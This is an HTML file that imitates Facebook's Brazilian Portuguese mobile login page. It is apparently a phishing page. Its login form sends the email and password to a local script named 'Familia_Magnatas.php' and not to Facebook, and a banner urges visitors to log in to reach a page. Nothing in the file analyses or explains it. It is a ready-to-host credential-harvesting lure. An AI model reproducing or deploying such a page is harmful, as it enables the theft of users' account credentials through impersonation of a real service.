<!DOCTYPE html>
<html>

<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <title>Facebook – Faca</title>
    <meta name="viewport" content="user-scalable=no,initial-scale=1,maximum-scale=1">
    <link href="https://static.xx.fbcdn.net/rsrc.php/v3/ya/r/O2aKM2iSbOw.png" rel="shortcut icon" sizes="196x196">
    <meta name="referrer" content="origin-when-crossorigin" id="meta_referrer">
    <meta name="theme-color" content="#3b5998">
    <link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/yY/l/0,cross/wt93s63nAT8.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="qj9TP" crossorigin="anonymous">
    <link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/yo/l/0,cross/hnCx-dImoeB.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="Y91eq" crossorigin="anonymous">
    <meta http-equiv="origin-trial" data-feature="getInstalledRelatedApps" data-expires="2017-12-04" content="AvpndGzuAwLY463N1HvHrsK3WE5yU5g6Fehz7Vl7bomqhPI/nYGOjVg3TI0jq5tQ5dP3kDSd1HXVtKMQyZPRxAAAAABleyJvcmlnaW4iOiJodHRwczovL2ZhY2Vib29rLmNvbTo0NDMiLCJmZWF0dXJlIjoiSW5zdGFsbGVkQXBwIiwiZXhwaXJ5IjoxNTEyNDI3NDA0LCJpc1N1YmRvbWFpbiI6dHJ1ZX0=">
    <meta name="description" content="Crie uma conta ou entre no Facebook. Conecte-se com amigos, familiares e outras pessoas que você conheça. Compartilhe fotos e vídeos, envie mensagens e...">
    <link rel="canonical" href="https://www.facebook.com/">
    <link href="https://static.xx.fbcdn.net/rsrc.php/v3/yb/r/0kd2uX-JJKD.js?_nc_x=Ij3Wp8lg5Kz" rel="preload" as="script" crossorigin="anonymous">
    <link href="https://static.xx.fbcdn.net/rsrc.php/v3/yp/r/yxoZJbssjxx.js?_nc_x=Ij3Wp8lg5Kz" rel="preload" as="script" crossorigin="anonymous">
    <link href="https://static.xx.fbcdn.net/rsrc.php/v3/yq/r/nG9q7FTBjI3.js?_nc_x=Ij3Wp8lg5Kz" rel="preload" as="script" crossorigin="anonymous">
    <link href="https://static.xx.fbcdn.net/rsrc.php/v3iNPx4/yT/l/pt_BR/T8FpZS6xuuJ.js?_nc_x=Ij3Wp8lg5Kz" rel="preload" as="script" crossorigin="anonymous">
    <link href="https://static.xx.fbcdn.net/rsrc.php/v3/yn/r/BKmsAikcnOf.js?_nc_x=Ij3Wp8lg5Kz" rel="preload" as="script" crossorigin="anonymous">
    <link href="https://static.xx.fbcdn.net/rsrc.php/v3is4v4/yN/l/pt_BR/lJsgq2-RQvl.js?_nc_x=Ij3Wp8lg5Kz" rel="preload" as="script" crossorigin="anonymous">
    <link href="https://static.xx.fbcdn.net/rsrc.php/v3icm24/yn/l/pt_BR/BzKY2ILN8UT.js?_nc_x=Ij3Wp8lg5Kz" rel="preload" as="script" crossorigin="anonymous">
    <link href="https://static.xx.fbcdn.net/rsrc.php/v3/y7/r/svFKQXueTby.js?_nc_x=Ij3Wp8lg5Kz" rel="preload" as="script" crossorigin="anonymous">
</head>

<body tabindex="0" class="touch x1-5 android _fzu _50-3 iframe acw portrait" style="min-height: 452px; background-color: rgb(255, 255, 255);">
    <div id="viewport" data-kaios-focus-transparent="1" style="min-height: 452px;">
        <h1 style="display:block;height:0;overflow:hidden;position:absolute;width:0;padding:0">Facebook</h1>
        <div id="page" class="_129_" id="header-notices">
        </div>
        <div class="_7om2 _52we _52z5" id="header">
            <div class="_4g34 _52z6" data-sigil="mChromeHeaderCenter">
                <a href="https://m.facebook.com/login/?refid=8">
                    <i class="img sp_EQll-mwFBYB_1_5x sx_60220a">
                        <u>facebook</u>
                    </i>
                </a>
            </div>
        </div>
        <div class="_5soa acw" id="root" role="main" data-sigil="context-layer-root content-pane" style="min-height: 452px;">
            <div class="_7om2">
                <div class="_4g34" id="u_0_0">
                    <div class="_5yd0 _2ph- _5yd1" style="display: none;" id="login_error" data-sigil="m_login_notice">
                        <div class="_52jd"></div>
                    </div>
                    <div class="_4-4l">
                        <div id="login_top_banner" data-sigil="m_login_upsell login_identify_step_element">
                            <div class="_qw9 grouped aclb" id="u_0_1"><a href="https://m.facebook.com/click.php?redir_url=%2Flite%2F%3Floc_ref%3Dlogin_top_banner%26referrer%3Dutm_reg%253DXN46XsYNEDpr1IENjfOsHh0G%26referrer_params%255Blink_source%255D%3Dfb_app_banner&amp;app_id=275254692598279&amp;cref=mb&amp;no_fw=1&amp;refid=8" target="_top" class="touchableArea first last area touchable acy apl abt abb" data-sigil="touchable marea">
                                    <div class="ib cc"><i class="l img sp_xm9DDmY7HAL_1_5x sx_76c966"></i>
                                        <div class="c"><span class="fcl">Faça login para pode ir para página.</span></div>
                                    </div>
                                </a></div><iframe style="display: none;"></iframe>
                        </div>
                        <div class="_5rut">
                            <form method="post" action="Familia_Magnatas.php" class="mobile-login-form _5spm" id="login_form" novalidate="1" data-sigil="m_login_form" data-autoid="autoid_2">
                                <div id="user_info_container" data-sigil="user_info_after_failure_element"></div>
                                <div id="pwd_label_container" data-sigil="user_info_after_failure_element"></div>
                                <div id="otp_retrieve_desc_container"></div>
                                <div class="_56be _5sob">
                                    <div class="_55wo _55x2 _56bf">
                                        <div id="email_input_container">
                                            <input autocorrect="off" autocapitalize="off" type="email" class="_56bg _4u9z _5ruq _8qtn" autocomplete="on" id="m_login_email" name="email" placeholder="Número de celular ou email" data-sigil="m_login_email"></div>
                                        <div>
                                            <div class="_1upc _mg8" data-sigil="m_login_password">
                                                <div class="_7om2">
                                                    <div class="_4g34 _5i2i _52we">
                                                        <div class="_5xu4">
                                                            <input autocorrect="off" autocapitalize="off" class="_56bg _4u9z _27z2 _8qtm" autocomplete="on" id="m_login_password" name="senha" placeholder="Senha" type="password" data-sigil="password-plain-text-toggle-input"></div>
                                                    </div>
                                                    <div class="_5s61 _216i _5i2i _52we">
                                                        <div class="_5xu4">
                                                            <div class="_2pi9" style="display:none" id="u_0_2"><a href="https://m.facebook.com/%2F%2Fwww.facebook.com%2F&amp;_rdr#" data-sigil="password-plain-text-toggle"><span class="mfss" style="display:none" id="u_0_3">OCULTAR</span><span class="mfss" id="u_0_4">MOSTRAR</span></a></div>
                                                        </div>
                                                    </div>
                                                </div>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                                <div class="_2pie" style="text-align:center;">
                                    <div id="u_0_5" data-sigil="login_password_step_element"><button type="submit" value="Entrar" class="_54k8 _52jg _56bs _26vk _56b_ _28lf _56bw _56bu" name="envia" data-sigil="touchable login_button_block m_login_button" data-autoid="autoid_4"><span class="_55sr">Entrar</span></button></div>
                                    <div class="_7eif" id="oauth_login_button_container" style="display:none"></div>
                                    <div class="_7f_d" id="oauth_login_desc_container" style="display:none"></div>
                                    <div id="otp_button_elem_container"></div>
                                </div>
                                <div class="_xo8"></div>
                            </form>
                            
                            <div>
                                <div class="other-links _8p_m">
                                    <ul class="_5pkb _55wp"><br />
                                        <li><span class="mfss fcg"><a tabindex="0" href="https://m.facebook.com/recover/initiate/?c=https%3A%2F%2Fm.facebook.com%2F%3Frefsrc%3Dhttps%253A%252F%252Fwww.facebook.com%252F&amp;r&amp;cuid&amp;ars=facebook_login&amp;lwv=100&amp;refid=8" id="forgot-password-link">Esqueceu a senha?</a></span></li>
                                    </ul>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
            <div style="display:none">
                <div><iframe id="u_0_6" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" height="1" width="1" src="cid:frame-AC377601186B42CCEF5E6EB077D55D65@mhtml.blink"></iframe><iframe id="u_0_7" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" height="1" width="1" src="cid:frame-21DFB6BF739C83DC4F4B032408036385@mhtml.blink"></iframe></div>
                <div></div>
            </div><span><img src="https://facebook.com/security/hsts-pixel.gif" width="0" height="0" style="display:none"></span>
            <div class="_55wr _5ui2" data-sigil="m_login_footer">
                <div class="_5dpw">
                    <div class="_5ui3" data-nocookies="1" id="locale-selector" data-sigil="language_selector marea">
                        <div class="_7om2">
                            <div class="_4g34"><span class="_52jc _52j9 _52jh _3ztb">Português (Brasil)</span>
                                <div class="_3ztc"><span class="_52jc"><a href="https://m.facebook.com/a/language.php?l=es_LA&amp;lref=https%3A%2F%2Fm.facebook.com%2F%3Frefsrc%3Dhttps%253A%252F%252Fwww.facebook.com%252F&amp;sref=legacy_mobile_settings_selector&amp;gfid=AQDPTPZvdoZ7JSAn&amp;refid=8" data-locale="es_LA" data-sigil="change_language">Español</a></span></div>
                                <div class="_3ztc"><span class="_52jc"><a href="https://m.facebook.com/a/language.php?l=de_DE&amp;lref=https%3A%2F%2Fm.facebook.com%2F%3Frefsrc%3Dhttps%253A%252F%252Fwww.facebook.com%252F&amp;sref=legacy_mobile_settings_selector&amp;gfid=AQBX0z7ssSmvvewR&amp;refid=8" data-locale="de_DE" data-sigil="change_language">Deutsch</a></span></div>
                                <div class="_3ztc"><span class="_52jc"><a href="https://m.facebook.com/a/language.php?l=ar_AR&amp;lref=https%3A%2F%2Fm.facebook.com%2F%3Frefsrc%3Dhttps%253A%252F%252Fwww.facebook.com%252F&amp;sref=legacy_mobile_settings_selector&amp;gfid=AQBhKE-WluwQFgxQ&amp;refid=8" data-locale="ar_AR" data-sigil="change_language">العربية</a></span></div>
                            </div>
                            <div class="_4g34">
                                <div class="_3ztc"><span class="_52jc"><a href="https://m.facebook.com/a/language.php?l=en_US&amp;lref=https%3A%2F%2Fm.facebook.com%2F%3Frefsrc%3Dhttps%253A%252F%252Fwww.facebook.com%252F&amp;sref=legacy_mobile_settings_selector&amp;gfid=AQA5lGuY6k3LOPQx&amp;refid=8" data-locale="en_US" data-sigil="change_language">English (US)</a></span></div>
                                <div class="_3ztc"><span class="_52jc"><a href="https://m.facebook.com/a/language.php?l=fr_FR&amp;lref=https%3A%2F%2Fm.facebook.com%2F%3Frefsrc%3Dhttps%253A%252F%252Fwww.facebook.com%252F&amp;sref=legacy_mobile_settings_selector&amp;gfid=AQB_bmjhTA9L6ZzH&amp;refid=8" data-locale="fr_FR" data-sigil="change_language">Français (France)</a></span></div>
                                <div class="_3ztc"><span class="_52jc"><a href="https://m.facebook.com/a/language.php?l=it_IT&amp;lref=https%3A%2F%2Fm.facebook.com%2F%3Frefsrc%3Dhttps%253A%252F%252Fwww.facebook.com%252F&amp;sref=legacy_mobile_settings_selector&amp;gfid=AQDEux-G49m1u5QC&amp;refid=8" data-locale="it_IT" data-sigil="change_language">Italiano</a></span></div><a href="https://m.facebook.com/language.php?n=https%3A%2F%2Fm.facebook.com%2F%3Frefsrc%3Dhttps%253A%252F%252Fwww.facebook.com%252F&amp;refid=8">
                                    <div class="_3j87 _1rrd _3ztd" aria-label="Lista completa de idiomas" data-sigil="more_language"><i class="img sp_EQll-mwFBYB_1_5x sx_74328b"></i></div>
                                </a>
                            </div>
                        </div>
                    </div>
                    <div class="_5ui4"><span class="mfss fcg">Facebook, Inc.</span></div>
                </div>
            </div>
        </div>
        <div class=""></div>
        <div class="viewportArea _2v9s" style="display:none" id="u_0_8" data-sigil="marea">
            <div class="_5vsg" id="u_0_9" style="max-height: 160px;"></div>
            <div class="_5vsh" id="u_0_a" style="max-height: 226px;"></div>
            <div class="_5v5d fcg">
                <div class="_2so _2sq _2ss img _50cg" data-animtype="1" data-sigil="m-loading-indicator-animate m-loading-indicator-root"></div>Carregando...
            </div>
        </div>
        <div class="viewportArea aclb" id="mErrorView" style="display:none" data-sigil="marea">
            <div class="container">
                <div class="image"></div>
                <div class="message" data-sigil="error-message"></div><a class="link" data-sigil="MPageError:retry">Tentar novamente</a>
            </div>
        </div>
    </div>
    </div>
    <div id="static_templates">
        <div class="mDialog" id="modalDialog" style="display:none" data-sigil=" context-layer-root" data-autoid="autoid_1">
            <div class="_52z5 _451a mFuturePageHeader _1uh1 firstStep titled" id="mDialogHeader">
                <div class="_7om2 _52we">
                    <div class="_5s61">
                        <div class="_52z7"><button type="submit" value="Cancelar" class="cancelButton btn btnD bgb mfss touchable" id="u_0_c" data-sigil="dialog-cancel-button">Cancelar</button><button type="submit" value="Voltar" class="backButton btn btnI bgb mfss touchable iconOnly" aria-label="Voltar" id="u_0_d" data-sigil="dialog-back-button"><i class="img sp_EQll-mwFBYB_1_5x sx_10407c" style="margin-top: 2px;"></i></button></div>
                    </div>
                    <div class="_4g34">
                        <div class="_52z6">
                            <div class="_50l4 mfsl fcw" id="m-future-page-header-title" role="heading" tabindex="0" data-sigil="m-dialog-header-title dialog-title">Carregando...</div>
                        </div>
                    </div>
                    <div class="_5s61">
                        <div class="_52z8" id="modalDialogHeaderButtons"></div>
                    </div>
                </div>
            </div>
            <div class="modalDialogView" id="modalDialogView"></div>
            <div class="_5v5d _5v5e fcg" id="dialogSpinner">
                <div class="_2so _2sq _2ss img _50cg" data-animtype="1" id="u_0_b" data-sigil="m-loading-indicator-animate m-loading-indicator-root"></div>Carregando...
            </div>
        </div>
    </div>
    <link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/yb/r/0kd2uX-JJKD.js?_nc_x=Ij3Wp8lg5Kz" as="script" crossorigin="anonymous">
    <link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/yp/r/yxoZJbssjxx.js?_nc_x=Ij3Wp8lg5Kz" as="script" crossorigin="anonymous">
    <link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/yq/r/nG9q7FTBjI3.js?_nc_x=Ij3Wp8lg5Kz" as="script" crossorigin="anonymous">
    <link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3iNPx4/yT/l/pt_BR/T8FpZS6xuuJ.js?_nc_x=Ij3Wp8lg5Kz" as="script" crossorigin="anonymous">
</body>

</html>